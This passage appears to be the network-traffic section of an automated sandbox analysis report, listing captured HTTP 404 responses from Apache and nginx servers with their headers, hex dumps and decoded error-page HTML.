65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BAC77301CE331898FF2AF5DDCA8E709C19D02B8BC80A5F6DFFF4B3B7D01Set-Cookie: _csrf=6c69579958ed0c991320ab80f32bc9ff2d20d45d2426e21589aa2e6f8f253655a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ViUHRtJmdzTkEEH8FUwB1vPvLxXyFhMS%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 50 50 63 6e 44 67 71 39 73 79 30 32 37 79 52 4b 67 32 4a 34 30 66 6a 4a 51 4c 73 64 79 65 41 75 32 32 4f 4a 4c 7a 4f 6d 6b 4c 47 6d 6f 6e 55 61 6c 36 38 6f 64 43 68 36 50 70 76 53 4d 48 62 41 62 5a 53 51 4e 30 42 64 5f 62 33 46 64 5a 64 2d 71 62 58 45 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B2EA5E1440509EDF1D35A7BA1797064662FBD6D8431FC423EE8E18D6B00Set-Cookie: _csrf=46d9ec36021cecbb201271f7429b7c09ce22841aaada7658682c9161af282745a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22sFeGQzX5g4VcFsVgC3KWW-AWyMUqmh7U%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 4a 50 4d 65 7a 55 41 5a 47 75 66 49 6c 5f 77 33 4a 59 37 4c 6c 57 79 36 55 5a 62 4d 49 69 45 2d 7a 61 6e 39 69 74 68 78 56 65 58 31 61 6b 38 5a 48 6f 38 58 76 67 57 43 5a 4f 61 35 57 31 4a 46 6f 47 69 45 51 77 64 79 64 4f 43 65 5f 4b 48 52 67 6e 79 41 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B1A9645E836DA16F8DD7CC6037B835F7FC2FFFD1F56941C22E61C784E00Set-Cookie: _csrf=769a271172a1a33600c574635817d7b163ee9397884e6a4b356173dd8438dedba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22kN8BQdzrJHiDz2F7jvTAR5UZ6-2wG0eW%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 61 71 74 2d 73 38 4e 37 41 68 72 45 72 32 34 62 39 52 6b 62 68 68 77 46 5a 6e 46 41 72 48 38 44 57 53 44 78 4c 4a 42 31 54 45 53 35 4a 57 34 6e 6d 6d 57 65 69 46 61 31 50 77 56 35 69 4a 5a 63 67 5a 42 32 4a 63 33 35 4b 59 37 53 62 47 7a 39 58 47 77 5a 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B4F552EDAF337E5D7845D348EA10E745893F97286B7A63F0677EE1DD900Set-Cookie: _csrf=219e8a8ce99fa31eb463941af2ec4cb7ba5d4d144b3a88777ee74154657dea82a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Ue2GhjZqRadBiFa74w7Ls5SA7NQhitfR%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6e 4c 4e 30 33 39 44 34 4a 57 75 47 7a 79 45 58 4a 56 2d 73 78 47 65 72 79 4d 37 5a 61 56 74 63 5a 46 71 6d 74 52 73 42 47 65 62 46 5f 2d 55 46 79 6d 36 35 50 78 36 57 4d 59 31 30 78 2d 45 4a 65 6d 59 62 30 68 51 39 69 78 47 33 7a 76 79 76 52 68 69 4e 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 15:43:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T15:43:05.9036713Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:39 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
